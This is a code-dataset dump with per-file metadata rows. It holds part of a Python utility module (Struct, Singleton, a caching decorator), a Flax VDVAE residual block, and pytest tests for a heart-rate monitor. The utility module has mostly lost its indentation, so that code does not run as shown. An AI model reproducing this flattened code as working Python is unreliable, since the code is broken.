s.cast('3.0') : 3.0
s.keys() : ['name', 'value']
s.to_str() : "fandango.Struct({'name': obj1,'value': 3.0,})"
s.dict() : {'name': 'obj1', 'value': 3.0}
"""
def __init__(self,*args,**kwargs):
self.load(*args,**kwargs)
def load(self,*args,**kwargs):
dct = args[0] if len(args)==1 else (args or kwargs)
if isSequence(dct) and not isDictionary(dct):
dct = dict.fromkeys(dct) #isDictionary also matches items lists
[setattr(self,k,v) for k,v in (dct.items()
if hasattr(dct,'items') else dct)]
#Overriding dictionary methods
def update(self,*args,**kwargs): return self.load(*args,**kwargs)
def keys(self): return self.__dict__.keys()
def values(self): return self.__dict__.values()
def items(self): return self.__dict__.items()
def dict(self): return self.__dict__
def get(self,k,default=None):
try: #Some keys may raise exception
return getattr(self,k,default)
except:
return default
def get_key(self,value):
""" Reverse lookup """
for k,v in self.items():
if v == value:
return k
raise Exception('%s_NotFound!'%value)
def set(self,k,v): return setattr(self,k,v)
def setdefault(self,v): self.dict().setdefault(v)
def pop(self,k): return self.__dict__.pop(k)
def has_key(self,k): return self.__dict__.has_key(k)
def __getitem__(self,k): return getattr(self,k)
def __setitem__(self,k,v): return setattr(self,k,v)
def __contains__(self,k): return hasattr(self,k)
def __call__(self,*args,**kwargs):
"""getter with one string, setter if 2 are passed"""
assert len(args) in (1,2)
if len(args)==2: setattr(self,args[0],args[1])
elif len(args)==1 and isString(args[0]): return getattr(self,args[0])
else: self.load(*args,**kwargs)
def __repr__(self):
return 'fandango.Struct({\n'+'\n'.join("\t'%s': %s,"%(k,v)
for k,v in self.__dict__.items())+'\n\t})'
def __str__(self):
return self.__repr__().replace('\n','').replace('\t','')
def to_str(self,order=None,sep=','):
""" This method provides a formatable string for sorting"""
return self.__str__() if order is None else (
sep.join('%s'%self[k] for k in order))
def default_cast(self,key=None,value=None):
"""
This method checks if key is already defined.
If it is, it will return value as an evaluable string.
If it is not, then it will do same action on the passed value.
"""
if key not in self.keys() and not value:
key,value = None,key #defaults to single argument mode
value = notNone(value,key and self.get(key))
if not isString(value):
return value
else:
return str2type(value)
def cast(self,key=None,value=None,method=None):
"""
The cast() method is used to convert an struct to a pickable/json obj
Use set_cast_method(f) to override this call.
The cast method must accept both key and value keyword arguments.
"""
return (method or self.default_cast)(key,value)
def cast_items(self,items=[],update=True):
"""
The cast() method is used to convert an struct to a pickable/json obj
"""
items = items or self.items()
items = [(k,self.cast(value=v)) for k,v in self.items()]
if update:
[self.set(k,v) for k,v in items]
return items
def _fget(self,var):
return getattr(self,var)
def _fset(self,value,var):
setattr(self,var,value)
def _fdel(self,var):
delattr(self,var)
def make_property(var,fget=_fget,fset=_fset,fdel=_fdel):
""" This Class is in Beta, not fully implemented yet"""
return property(partial(fget,var=var),partial(fset,var=var),
partial(fdel,var=var),doc='%s property'%var)
class Variable(object):
"""
This class helps to declare module variables that can share the
state when updated from parent modules.
e.g. fandango.DEFAULT_TIME_FORMAT <=> functional.DEFAULT_TIME_FORMAT
"""
    def __new__(cls, value):
        __instance = object.__new__(cls)  # object.__new__ takes no extra args
        cls.__init__(__instance, value)
        return __instance.value
def __init__(self, value = None):
self._value = value
@property
def value(self):
return self._value
    @value.setter
    def value(self, value):
        self._value = value
#class NamedProperty(property):
#"""
#"""
#def __init__(self,name,fget=None,fset=None,fdel=None):
#self.name = name
#mname = '%s%s'%(name[0].upper(),name[1:])
#lname = '%s%s'%(name[0].lower(),name[1:])
#property.__init__(fget,fset,fdel,doc='NamedProperty(%s)'%self._name)
#def get_attribute_name(self):
    #return '_%s' % self.name
def NamedProperty(name,fget=None,fset=None,fdel=None):#,doc=None):
"""
This Class is in Beta, not fully implemented yet
It makes easier to declare name independent property's (descriptors) by
using template methods like:
def fget(self,var): # var is the identifier of the variable
return getattr(self,var)
def fset(self,value,var): # var is the identifier of the variable
setattr(self,var,value)
def fdel(self,var): # var is the identifier of the variable
delattr(self,var)
MyObject.X = Property(fget,fset,fdel,'X')
"""
return property(partial(fget,var=name) if fget else None,
partial(fset,var=name) if fset else None,
partial(fdel,var=name) if fdel else None,doc=name)
import threading
__lock__ = threading.RLock()
def locked(f,*args,**kwargs):
"""
decorator for secure-locked functions
A key-argument _lock can be used to use a custom Lock object
"""
_lock = kwargs.pop('_lock',__lock__)
try:
_lock.acquire()
return f(*args,**kwargs)
    except Exception as e:
        print('Exception in %s(*%s,**%s): %s' % (f.__name__,args,kwargs,e))
finally:
_lock.release()
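# A minimal usage sketch: locked() runs the callable immediately while
# holding the lock; pass _lock= to use a dedicated lock instead of the
# module-wide __lock__.
def _locked_example():
    counters = {'n': 0}
    def bump():
        counters['n'] += 1
        return counters['n']
    return locked(bump, _lock=threading.RLock())  # -> 1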
def self_locked(func,reentrant=True):
''' Decorator to make thread-safe class members
@deprecated
@note see in tau.core.utils.containers
Decorator to create thread-safe objects.
reentrant: CRITICAL:
With Lock() this decorator should not be used to decorate nested
functions; it will cause Deadlock!
With RLock this problem is avoided ... but you should rely more
on python threading.
'''
@functools.wraps(func)
def lock_fun(self,*args,**kwargs):
#self,args = args[0],args[1:]
if not hasattr(self,'lock'):
setattr(self,'lock',threading.RLock() if reentrant
else threading.Lock())
if not hasattr(self,'trace'):
setattr(self,'trace',False)
self.lock.acquire()
try:
#if self.trace: print "locked: %s"%self.lock
result = func(self,*args,**kwargs)
finally:
self.lock.release()
#if self.trace: print "released: %s"%self.lock
return result
#lock_fun.__name__ = func.__name__
#lock_fun.__doc__ = func.__doc__
return lock_fun
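# A minimal usage sketch: self_locked makes an instance method thread-safe
# by attaching a per-instance RLock on first call.
class _SafeCounter(object):
    def __init__(self):
        self.n = 0
    @self_locked
    def bump(self):
        self.n += 1
        return self.n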
###############################################################################
def NewClass(classname,classparent=None,classdict=None):
"""
Creates a new class on demand:
ReleaseNumber = NewClass('ReleaseNumber',tuple,
{'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))})
"""
if classparent and not isSequence(classparent):
classparent = (classparent,)
return type(classname,classparent or (object,),classdict or {})
class ReleaseNumber(object):
"""
ReleaseNumber = type('ReleaseNumber',(tuple,),{
'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))
})
"""
def __init__(self,*args):
assert args
if len(args)==1:
if isinstance(args[0],basestring):
args = args[0].split('.')
elif isSequenceType(args[0]):
args = args[0]
else:
args = [args]
self._tuple = tuple(args)
def __iter__(self): return self._tuple.__iter__()
def __len__(self): return self._tuple.__len__()
def __getitem__(self,i): return self._tuple.__getitem__(i)
def __hash__(self): return self._tuple.__hash__()
def __repr__(self):
return '.'.join(map(str,self))
def major(self):
try:
m = int(self[0])
return m
except:
return '0'
def minor(self):
try:
m = int(self[1])
return m
except:
return '0'
def patch(self):
try:
m = int(self[2])
return m
except:
return self[2] if len(self)>2 else '0'
def __cmp__(self,other):
if not isinstance(other,ReleaseNumber):
other = ReleaseNumber(other)
if self._tuple == other._tuple:
return 0
if int(self.major()) < other.major():
return -1
if int(self.major()) > other.major():
return 1
if int(self.minor()) < other.minor():
return -1
if int(self.minor()) > other.minor():
return 1
if self.patch() < other.patch():
return -1
if self.patch() > other.patch():
return 1
return 0
def __gt__(self,other): return self.__cmp__(other) > 0
def __ge__(self,other): return self.__cmp__(other) >= 0
def __lt__(self,other): return self.__cmp__(other) < 0
def __le__(self,other): return self.__cmp__(other) <= 0
def __eq__(self,other): return not self.__cmp__(other)
def __ne__(self,other): return self.__cmp__(other)
###############################################################################
class Object(object):
"""
This class solves some problems when an object inherits from multiple
classes and some of them inherit from the same 'grandparent' class
"""
def __init__(self):
""" default initializer
@todo be more clever!
"""
pass
#self.name = None
## @var name
# Var does nothing
# @todo be more clever!
pass
def call__init__(self, klass, *args, **kw):
if 'inited_class_list' not in self.__dict__:
self.inited_class_list = []
if klass not in self.inited_class_list:
self.inited_class_list.append(klass)
#print('#'*80)
#print('%s(%s).call__init__(%s,%s)' % (
#type(self).__name__,klass.__name__,args,kw))
#print('#'*80)
klass.__init__(self, *args, **kw)
def call_all__init__(self, klass, *_args, **_kw):
''' Call __init__ recursively, for multiple dynamic inheritance.
@author srubio@cells.es
This method should be called only if all arguments are keywords!!!
        Multiple __init__ calls with unnamed arguments are hard to manage:
All the _args values will be assigned to non-keyword args
e.g:
from objects import Object
class A(Object):
def __init__(self,a=2):
print 'A.__init__',a
class B(A):
def __init__(self,b):
print 'B.__init__',b
class C(B,A):
def __init__(self,c):
print 'C.__init__',c
class D(C,B):
def __init__(self,d=1,*args,**kwargs):
self.call_all__init__(D,*args,**kwargs)
print 'D.__init__',d
D(a=1,b=2,c=3,d=4)
'''
#if _args:
# raise Exception,'__init_all_Object_withUnnamedArgumentsException'
from inspect import getargspec
#print '%s.call_all__init__(%s,%s)' % (klass.__name__,_args,_kw)
for base in klass.__bases__:
if 'call__init__' in dir(base) and \
('inited_class_list' not in self.__dict__
or base not in self.inited_class_list):
#print '\t%s.base is %s' % (klass.__name__,base.__name__)
nkw,i = {},0
try:
args,largs,kargs,vals = getargspec(base.__init__)
if kargs: nkw = dict(_kw)
for arg in args:
if arg == 'self': continue
if arg in _kw:
nkw[arg] = _kw[arg]
elif i<len(_args):
nkw[arg], i = _args[i], i+1
self.call_all__init__(base,*_args,**_kw)
self.call__init__(base,**nkw)
            except Exception as e:
print('Unable to execute %s.__init__!: %s'
% (base.__name__,str(e)))
return
def getAttrDict(self):
return obj2dict(self)
def updateAttrDict(self, other):
attr = other.getAttrDict()
self.__dict__.update(attr)
###############################################################################
class Singleton(object):
"""
    This class allows Singleton objects by overriding __new__ and renaming
    __init__ to init_single.
    The __new__ method is overridden to force Singleton behaviour;
    the Singleton is created for the lowest subClass.
    @warning although __new__ is overridden, __init__ is still being called
    for each instance=Singleton(); this is why we replace it by __dumb_init
"""
## Singleton object
# the one, true Singleton, private members cannot be read directly
__instance = None
__dumb_init = (lambda self,*p,**k:None)
def __new__(cls, *p, **k):
if cls != type(cls.__instance):
__instance = object.__new__(cls)
#srubio: added init_single check to prevent redundant __init__ calls
if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
setattr(cls,'init_single',cls.__init__)
#Needed to avoid parent __init__ methods to be called
setattr(cls,'__init__',cls.__dumb_init)
if hasattr(cls,'init_single'):
#If no __init__ or init_single has been defined it may trigger
#an object.__init__ warning!
cls.init_single(__instance,*p,**k)
#Done at the end to prevent failed __init__ to create singletons
cls.__instance = __instance
return cls.__instance
@classmethod
def get_singleton(cls,*p,**k):
return cls.__instance or cls(*p,**k)
@classmethod
def clear_singleton(cls):
cls.__instance = None
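# A minimal usage sketch: every instantiation of a Singleton subclass
# returns the same object; the renamed __init__ (init_single) runs only
# for the first call.
class _Config(Singleton):
    def __init__(self, path='/tmp/app.cfg'):  # illustrative default
        self.path = path
# _Config('/tmp/a.cfg') is _Config('/tmp/b.cfg')  ->  True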
class SingletonMap(object):
"""
This class allows distinct Singleton objects for each args combination.
    The __new__ method is overridden to force Singleton behaviour; the Singleton
    is created for the lowest subClass.
    @warning although __new__ is overridden, __init__ is still being called
    for each instance=Singleton(); this is why we replace it by __dumb_init
"""
## Singleton object
# the one, true Singleton, private members cannot be read directly
__instances = {}
__dumb_init = (lambda self,*p,**k:None)
def __new__(cls, *p, **k):
key = cls.parse_instance_key(*p,**k)
if cls != type(cls.__instances.get(key)):
__instance = object.__new__(cls)
__instance.__instance_key = key
#srubio:added init_single check to prevent redundant __init__ calls
if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
setattr(cls,'init_single',cls.__init__)
#Needed to avoid parent __init__ methods to be called
setattr(cls,'__init__',cls.__dumb_init)
if hasattr(cls,'init_single'):
#If no __init__ or init_single has been defined it may trigger
#an object.__init__ warning!
cls.init_single(__instance,*p,**k)
cls.__instances[key] = __instance
            #print('#'*80+'\n'+'%s.__instances[%s] = %s'
            #    % (str(cls),key,str(__instance)))
return cls.__instances[key]
@classmethod
def get_singleton(cls,*p,**k):
key = cls.parse_instance_key(*p,**k)
return cls.__instances.get(key,cls(*p,**k))
@classmethod
def get_singletons(cls):
return cls.__instances
@classmethod
def clear_singleton(cls,*p,**k):
cls.__instances.pop(cls.parse_instance_key(*p,**k))
@classmethod
def clear_singletons(cls):
cls.__instances.clear()
@classmethod
def parse_instance_key(cls,*p,**k):
return '%s(*%s,**%s)' % (cls.__name__,list(p),list(sorted(k.items())))
def get_instance_key(self):
return self.__instance_key
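# A minimal usage sketch: SingletonMap keeps one instance per argument
# combination, keyed by parse_instance_key().
class _Device(SingletonMap):
    def __init__(self, name):
        self.name = name
# _Device('a') is _Device('a') -> True; _Device('b') is a distinct instance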
###############################################################################
class nullDecorator(object):
"""
Empty decorator with null arguments, used to replace pyqtSignal,pyqtSlot
"""
def __init__(self,*args):
pass
def __call__(self,f):
return f
def decorator_with_args(decorator):
'''
    A decorator with arguments must be applied with parenthesis, e.g.
    @decorated(), even when no arguments are used!
This method gets an d(f,args,kwargs) decorator and returns a new
single-argument decorator that embeds the new call inside.
But, this decorator disturbed stdout!!!!
There are some issues when calling nested decorators; it is clearly
better to use Decorator classes instead.
'''
# decorator_with_args = lambda decorator: \
# lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
return lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
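# A minimal usage sketch: wrapping a d(func, *args, **kwargs) decorator so
# it is applied with parenthesis, e.g. @_tagged('io'), even without args.
@decorator_with_args
def _tagged(func, label=''):
    func.label = label
    return func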
class Decorated(object):
"""
@TODO: This class should provide an API to get all decorators
applied to a python object and its methods
"""
pass
class Decorator(object):
"""
    This generic class makes it possible to distinguish decorators from ordinary classes.
"""
__example__ = """
SEE THE Cached DECORATOR CLASS FOR A REAL EXAMPLE, THIS IS JUST AN
ABSTRACT CLASS WITHOUT IMPLEMENTATION
It uses the __get__ descriptor to allow decoration of Class methods
Inherit from it and use issubclass(klass,Decorator) to know if a class
is a decorator
To add arguments to decorator reimplement __init__
To modify your wrapper reimplement __call__
A decorator __init__ with a single argument can be called like:
@D
def f(x):
pass
If you need a Decorator with arguments then __init__ will manage the
arguments and __call__ will take the function and return a wrapper instead.
@D(x,y)
def f(z):
pass
"""
@classmethod
def new_wrapped_instance(cls, *args, **kwargs):
""" obtain a better wrapped instance, experimental, doesnt work well on py2 """
func = args and args[0] or None
i = object.__new__(type(cls.__name__+'_'+func.__name__,(cls,),
{'__doc__': func.__doc__}))
cls.__init__(i,*args,**kwargs)
return i
def __init__(self,func):
self.func = func
#self.call = wraps(self.func)(self.__call__) #Not for methods!!
functools.update_wrapper(self,self.func)
def __call__(self,*args,**kwargs):
return self.func(*args,**kwargs)
def __get__(self,obj,objtype=None):
"""
This bounding method will be called only when decorating an
instance method
"""
return MethodType(self,obj,objtype)
def get_func(self):
return self.func
class ClassDecorator(Decorator):
"""
This empty class is not trivial. It identifies the QObject decorators
from fandango.qt module
Although empty, it is critical for Vacca. Modify it with care
"""
pass
class Cached(Decorator):
"""
This decorator will provide a function that caches up to N different
executions of a method (for different combinations of arguments) for
a given period. It is very similar to functools.lru_cache in py3
"""
__example__ = """
e.g.: check_device_cached = Cached(check_device,depth=10,keep=3)
It will keep cached for 3 seconds up to 10 different device check results.
If "func" is not declared, then it can be used as a decorator_with_args
@Cached(depth=10,keep=3)
def check_device(*a,**k):
...
return
The catched argument will print and return exceptions instead of throwing
"""
def __init__(self,func=None,depth=10,expire=3.,log=False,catched=False):
self.log = log
self._im = None
self.cache = {}
self.depth = depth
self.expire = expire
self.catched = catched
self.decorate(func)
#self.__code__ = getattr(func,'__code__',None)
self.__doc__ = '@Cached:'+str(getattr(func,'__doc__','') or '')
self.lock = threading.Lock()
def __call__(self,*args,**kwargs):
"""
This method will either decorate a method (with args) or execute it
"""
if self.func is None:
# Deferred decorator
self.decorate(args[0])
return self
else:
# Instantiated decorator
return self.execute(*args,**kwargs)
def _log(self,msg):
if isCallable(self.log):
self.log(msg)
elif self.log:
print(msg)
@staticmethod
def getCachedObject(obj,methods=[],depth=10.,expire=3.,catched=False):
""" @RISKY
This method will try to apply Cached decorator to all methods
of an object. USE IT AT YOUR OWN RISK!!
"""
klass = obj if isinstance(obj,type) else type(obj)
if not methods:
methods = [k for k,f in klass.__dict__.items() if isCallable(f)]
for k in methods:
try:
m = Cached(getattr(klass,k),depth,expire,catched=catched)
setattr(obj,k,m)
except:pass
return obj
def decorate(self,func):
if isCallable(func):
#self._log('decorate(%s)'%str(func))
self.func = func
#self.call = wraps(self.func)(self.__call__) #Not for methods!!
functools.update_wrapper(self,self.func)
else:
self.func = None
def prune(self,expire=None,depth=None):
try:
self.lock.acquire()
depth = notNone(depth,self.depth)
expire = time.time()-notNone(expire,self.expire)
cache = sorted(k for k in self.cache.keys() if k[0]>expire)
if (len(cache)!=len(self.cache) or len(cache)>self.depth):
#self._log('pruning: %s => %s'%(len(self.cache),len(cache)))
pass
self.cache = dict((k,self.cache[k]) for k in cache[-self.depth:])
return sorted(self.cache.keys())
finally:
self.lock.release()
def clear(self):
self.cache.clear()
def execute(self,*args,**kwargs):
#self._log('__call__(%s,%s)'%(args,kwargs))
v,match,expire = None,None,self.expire
try:
key = time.time(),tuple(args),tuple(kwargs.items())
#assert all(isinstance(k,Hashable) for l in key[1:] for k in l)
assert isHashable(key)
except:
self._log('unhashable arguments!')
expire = 0
if not self.depth or not expire:
self._log('disabling cache ...')
if not self.depth: self.cache = {}
return self.func(*args,**kwargs)
else:
cache = self.prune(expire)
match = first((k for k in cache if (k[1:]) == (key[1:])),None)
if match:
v = self.cache[match]
#self._log('(%s,%s) was in cache: %s'%(args,kwargs,v))
else:
try:
v = self.func(*args,**kwargs)
                except Exception as e:
v = e
#self._log('%s(%s,%s) = %s'%(self.func,args,kwargs,v))
try:
self.cache[key] = v
except:
print('%s(%s,%s) = %s'%(self.func,args,kwargs,v))
print('cache[%s] = %s'%(key,v))
raise
if isinstance(v,Exception):
if self.catched:
if not match:
self._log(traceback.format_exc())
return v
else:
self._log(str(self.func))
self._log(traceback.format_exc())
raise v
else:
return v
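# A minimal usage sketch mirroring the __example__ above: cache up to 10
# argument combinations of a slow call for 3 seconds each.
def _slow_square(x):
    time.sleep(0.1)
    return x * x
_cached_square = Cached(_slow_square, depth=10, expire=3.)
# the first _cached_square(4) computes; repeated calls within 3s hit the cache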
###########################################################################
## @DEPRECATED!
class BoundDecorator(Decorator):
"""
    DEPRECATED, to be removed in Fandango 13;
replaced by the use of __get__ descriptor
Inspired in
https://wiki.python.org/moin/PythonDecoratorLibrary
#Class_method_decorator_using_instance
Class method decorator specific to the instance.
It uses a descriptor to delay the definition of the
method wrapper.
To use it, just inherit from it and rewrite the wrapper method
Example:
from fandango.objects import BoundDecorator
BoundDecorator().tracer = 1
class X(object):
def __init__(self,name):
self.name = name
def f(self,*args):
return (self.name,args)
class D(BoundDecorator):
@staticmethod
def wrapper(instance,f,*args,**kwargs):
print('guess what?')
v = f(instance,*args,**kwargs)
return v[0]
x = X('a')
X.f = D()(X.f)
x.f()
"""
def __init__(self,*args,**kwargs):
print('BoundDecorator is DEPRECATED!!!, Use Decorator.__get__ instead')
Decorator.__init__(self,*args,**kwargs)
@staticmethod
def wrapper(instance,f,*args,**kwargs):
return f(instance, *args, **kwargs)
class _Tracer(object):
def __init__(self):
self._trace = False
def __get__(self,obj,type=None):return self
def __set__(self,obj,value):self._trace = value
def __nonzero__(self): return self._trace
def __call__(self,msg):
if self: print(msg)
#NOTE: Giving a value to Tracer only works with instances; not from class
tracer = _Tracer()
def __call__(this,f=None):
class _Descriptor(BoundDecorator):
# Inherits to get the wrapper from the BoundDecorator class
# and be able to exist "onDemand"
def __init__(self, f):
self.func = f
def __get__(self, instance, klass):
BoundDecorator.tracer('__get__(%s,%s)'%(instance,klass))
if instance is None:
# Class method was requested
return self.make_unbound(klass)
return self.make_bound(instance)
def make_unbound(self, klass):
BoundDecorator.tracer('make_unbound(%s)'%klass)
@functools.wraps(self.func)
def wrapper(*args, **kwargs):
                '''This documentation will disappear :)
This method may work well only without arguments
'''
BoundDecorator.tracer(
"Called the unbound method %s of %s"
%(self.func.__name__, klass.__name__))
return partial(this.wrapper,f=f)(*args,**kwargs)
return wrapper
def make_bound(self, instance):
BoundDecorator.tracer('make_bound(%s)'%instance)
@functools.wraps(self.func)
def wrapper(*args, **kwargs):
                '''This documentation will disappear :)'''
BoundDecorator.tracer(
"Called the decorated method %s of %s"
%(self.func.__name__, instance))
#return self.func(instance, *args, **kwargs)
return this.wrapper(instance,f,*args,**kwargs)
#wrapper = self.wrapper #wraps(self.func)(self.wrapper)
# This instance does not need the descriptor anymore,
# let it find the wrapper directly next time:
setattr(instance, self.func.__name__, wrapper)
return wrapper
return _Descriptor(f)
from . import doc
__doc__ = doc.get_fn_autodoc(__name__,vars())
| 33.938967
| 89
| 0.56135
| 24,906
| 0.689058
| 0
| 0
| 3,377
| 0.093429
| 0
| 0
| 14,820
| 0.410015
|
0b42ef18819891116ae94c7d2436b4f0dab7c2b9
| 5,877
|
py
|
Python
|
vdvae_flax/blocks.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 23,901
|
2018-10-04T19:48:53.000Z
|
2022-03-31T21:27:42.000Z
|
vdvae_flax/blocks.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 891
|
2018-11-10T06:16:13.000Z
|
2022-03-31T10:42:34.000Z
|
vdvae_flax/blocks.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 6,047
|
2018-10-12T06:31:02.000Z
|
2022-03-31T13:59:28.000Z
|
# coding=utf-8
# Copyright 2021 DeepMind Technologies Limited and the Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Building blocks for VDVAE."""
from typing import Optional, Tuple
import chex
from flax import linen as nn
import jax
_NUM_CONV_LAYER_PER_BLOCK = 4
def get_vdvae_convolution(output_channels,
kernel_shape,
weights_scale = 1.,
name = None,
precision = None):
"""Builds a 2D convolution.
Args:
output_channels: number of output channels.
kernel_shape: shape of convolutional kernel.
weights_scale: scale of initial weights in the convolution.
name: name of the module.
precision: jax precision.
Returns:
a nn.Conv2D.
"""
kernel_init = nn.initializers.variance_scaling(
scale=weights_scale, mode='fan_in', distribution='truncated_normal')
return nn.Conv(
features=output_channels,
kernel_size=kernel_shape,
strides=(1, 1),
padding='SAME',
use_bias=True,
kernel_init=kernel_init,
name=name,
precision=precision)
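# A minimal usage sketch (not in the original file): the down-scaled final
# convolution of a residual block; the channel count is an assumption.
def example_final_conv(output_channels=16):
  return get_vdvae_convolution(
      output_channels, (3, 3), weights_scale=0.5, name='c3')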
class ResBlock(nn.Module):
"""Residual block from the VDVAE paper.
This block is made of four convolutions, followed by an optional residual
connection and an optional average pooling to downsample the image.
Compared to the paper, it uses the same gelu non-linearity but no batch
normalization.
It also accepts as an optional input an auxiliary batch of context vectors to
be processed by 1x1 convolutions. This is typically useful to condition a VAE
on an embedded context.
"""
internal_channels: int
output_channels: int
downsampling_rate: int = 1
use_residual_connection: bool = False
last_weights_scale: float = 1.
precision: Optional[jax.lax.Precision] = None
@nn.compact
def __call__(
self,
inputs,
context_vectors = None,
):
"""Applies the res block to input images.
Args:
inputs: a rank-4 array of input images of shape (B, H, W, C).
context_vectors: optional auxiliary inputs, typically used for
conditioning. If set, they should be of rank 2, and their first (batch)
dimension should match that of `inputs`. Their number of features is
arbitrary. They will be reshaped from (B, D) to (B, 1, 1, D) and a 1x1
convolution will be applied to them.
Returns:
      the rank-4 output of the block.
"""
if self.downsampling_rate < 1:
raise ValueError('downsampling_rate should be >= 1, but got '
f'{self.downsampling_rate}.')
def build_layers(inputs):
"""Build layers of the ResBlock given a batch of inputs."""
resolution = inputs.shape[1]
if resolution > 2:
kernel_shapes = ((1, 1), (3, 3), (3, 3), (1, 1))
else:
kernel_shapes = ((1, 1), (1, 1), (1, 1), (1, 1))
conv_layers = []
aux_conv_layers = []
for layer_idx, kernel_shape in enumerate(kernel_shapes):
is_last = layer_idx == _NUM_CONV_LAYER_PER_BLOCK - 1
num_channels = self.output_channels if is_last else self.internal_channels
weights_scale = self.last_weights_scale if is_last else 1.
conv_layers.append(
get_vdvae_convolution(
num_channels,
kernel_shape,
weights_scale,
name=f'c{layer_idx}',
precision=self.precision))
aux_conv_layers.append(
get_vdvae_convolution(
num_channels, (1, 1),
0.,
name=f'aux_c{layer_idx}',
precision=self.precision))
return conv_layers, aux_conv_layers
chex.assert_rank(inputs, 4)
if inputs.shape[1] != inputs.shape[2]:
raise ValueError('VDVAE only works with square images, but got '
f'rectangular images of shape {inputs.shape[1:3]}.')
if context_vectors is not None:
chex.assert_rank(context_vectors, 2)
inputs_batch_dim = inputs.shape[0]
aux_batch_dim = context_vectors.shape[0]
if inputs_batch_dim != aux_batch_dim:
raise ValueError('Context vectors batch dimension is incompatible '
'with inputs batch dimension. Got '
f'{aux_batch_dim} vs {inputs_batch_dim}.')
context_vectors = context_vectors[:, None, None, :]
conv_layers, aux_conv_layers = build_layers(inputs)
outputs = inputs
for conv, auxiliary_conv in zip(conv_layers, aux_conv_layers):
outputs = conv(jax.nn.gelu(outputs))
if context_vectors is not None:
outputs += auxiliary_conv(context_vectors)
if self.use_residual_connection:
in_channels = inputs.shape[-1]
out_channels = outputs.shape[-1]
if in_channels != out_channels:
raise AssertionError('Cannot apply residual connection because the '
'number of output channels differs from the '
'number of input channels: '
f'{out_channels} vs {in_channels}.')
outputs += inputs
if self.downsampling_rate > 1:
shape = (self.downsampling_rate, self.downsampling_rate)
outputs = nn.avg_pool(
outputs, window_shape=shape, strides=shape, padding='VALID')
return outputs
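# A minimal usage sketch (not in the original file); shapes and channel
# counts below are assumptions chosen for illustration.
def example_apply_res_block():
  """Initializes and applies a ResBlock to two 8x8 RGB images."""
  import jax.numpy as jnp
  block = ResBlock(internal_channels=32, output_channels=16)
  images = jnp.zeros((2, 8, 8, 3))
  variables = block.init(jax.random.PRNGKey(0), images)
  return block.apply(variables, images)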
| 35.618182
| 82
| 0.650842
| 4,222
| 0.718394
| 0
| 0
| 3,521
| 0.599115
| 0
| 0
| 2,535
| 0.431343
|
0b43e92ff65dfbae4bcf1fe66e16f6008f379b22
| 2,605
|
py
|
Python
|
test_hrm_code.py
|
liameirose/bme590hrm
|
d44573b73b46b121a31667c12bb6add4e8a8daa7
|
[
"MIT"
] | null | null | null |
test_hrm_code.py
|
liameirose/bme590hrm
|
d44573b73b46b121a31667c12bb6add4e8a8daa7
|
[
"MIT"
] | 2
|
2018-10-20T22:16:56.000Z
|
2018-10-25T23:56:43.000Z
|
test_hrm_code.py
|
liameirose/bme590hrm
|
d44573b73b46b121a31667c12bb6add4e8a8daa7
|
[
"MIT"
] | null | null | null |
import pytest
import json
import numpy as np
@pytest.mark.parametrize("candidate, expected", [
(1.345, True),
(-4.554, True),
('9999', True)
])
def test_number_please(candidate, expected):
from hrm_code import number_please
assert number_please(candidate) == expected
def test_import_data():
from hrm_code import import_data
[time, voltage] = import_data("test_data/test_data2.csv")
assert time[0] == 0
assert voltage[0] == -0.345
def test_calc_duration():
from hrm_code import calc_duration
fake_time = [0, 1, 2, 3, 4.3, 5, 6, 7.2]
dur = calc_duration(fake_time)
assert dur == 7.2
def test_find_min_max_volt():
from hrm_code import find_max_min_volt
fake_voltage = [1.2, -0.3, 4.8, 0, -3]
both = find_max_min_volt(fake_voltage)
assert both == [-3, 4.8]
def test_calc_freq():
from hrm_code import calc_sample_freq
fake_time = [0, 0.5, 1, 1.5, 2]
fs = calc_sample_freq(fake_time)
assert fs == 2
def test_detect_peak():
from hrm_code import detect_peak
# Peaks should occur every 60 sec
fs = 60
t = np.arange(0, 5, 1/fs)
wave = abs(np.sin(t*np.pi)**20)
peaks = detect_peak(wave, fs, hrw=0.1)
assert peaks == [27, 87, 147, 207, 267]
def test_num_beat():
from hrm_code import num_beat
fake_peaklist = [1, 3, 4]
fake_time = [0, 0.5, 1, 1.5, 2, 2.5, 3]
[num_beats, beats] = num_beat(fake_time, fake_peaklist)
assert num_beats == 3
assert beats == [0.5, 1.5, 2]
def test_calc_bpm():
from hrm_code import calc_bpm
fake_num_beats = 20
fake_dur = 40
bpm = calc_bpm(fake_num_beats, fake_dur)
assert bpm == 30
def test_create_metrics():
from hrm_code import create_metrics
bpm = 70
both = [-1.4, 5.6]
dur = 30
num_beats = 80
beats = [0.5, 0.75, 0.8]
metrics = create_metrics(bpm, beats, both, dur, num_beats)
assert metrics == {
"mean_hr_bpm": 70,
"voltage extremes": [-1.4, 5.6],
"duration": 30,
"num_beats": 80,
"beats": [0.5, 0.75, 0.8]
}
def test_create_jason():
from hrm_code import create_jason
metrics = {"Favorite Ice Cream Flavor": "Chocolate",
"Favorite Book": "A Tree Grows in Brooklyn",
"Favorite Number": 8}
filename = "test_output.csv"
create_jason(filename, metrics)
read_file = json.load(open('test_output.json'))
assert read_file == {"Favorite Ice Cream Flavor": "Chocolate",
"Favorite Book": "A Tree Grows in Brooklyn",
"Favorite Number": 8}
| 26.05
| 69
| 0.621881
| 0
| 0
| 0
| 0
| 242
| 0.092898
| 0
| 0
| 372
| 0.142802
|
0b44a978913b26bbf0d8ab188b6560f82d0fe2d3
| 1,068
|
py
|
Python
|
core/migrations/0044_auto_20190510_0921.py
|
raheemazeezabiodun/art-backend
